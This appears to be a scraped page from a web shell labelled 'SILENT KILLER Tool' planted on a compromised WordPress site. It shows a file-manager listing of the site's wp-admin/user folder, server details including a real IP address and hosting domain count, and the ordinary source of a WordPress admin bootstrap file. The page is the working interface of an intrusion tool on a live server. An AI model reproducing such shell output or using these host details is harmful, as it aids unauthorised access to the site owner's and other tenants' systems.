Current Path: > > > home > codekrsu > escapematrixonline.com > wp-admin > user
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
about.php | File | 257 bytes | February 06 2020 11:33:12. | |
admin.php | File | 865 bytes | February 06 2020 11:33:12. | |
contribute.php | File | 267 bytes | May 08 2024 21:04:14. | |
credits.php | File | 261 bytes | February 06 2020 11:33:12. | |
error_log | File | 18540 bytes | July 30 2025 03:19:08. | |
freedoms.php | File | 263 bytes | February 06 2020 11:33:12. | |
index.php | File | 251 bytes | February 06 2020 11:33:12. | |
menu.php | File | 831 bytes | January 22 2025 19:06:22. | |
pj_search | File | 9781 bytes | February 06 2020 11:33:12. | |
privacy.php | File | 261 bytes | February 06 2020 11:33:12. | |
profile.php | File | 252 bytes | February 06 2020 11:33:12. | |
user-edit.php | File | 250 bytes | February 06 2020 11:33:12. |
<?php /** * WordPress User Administration Bootstrap * * @package WordPress * @subpackage Administration * @since 3.1.0 */ define( 'WP_USER_ADMIN', true ); require_once dirname( __DIR__ ) . '/admin.php'; if ( ! is_multisite() ) { wp_redirect( admin_url() ); exit; } $redirect_user_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) ); /** * Filters whether to redirect the request to the User Admin in Multisite. * * @since 3.2.0 * * @param bool $redirect_user_admin_request Whether the request should be redirected. */ $redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request ); if ( $redirect_user_admin_request ) { wp_redirect( user_admin_url() ); exit; } unset( $redirect_user_admin_request );
SILENT KILLER Tool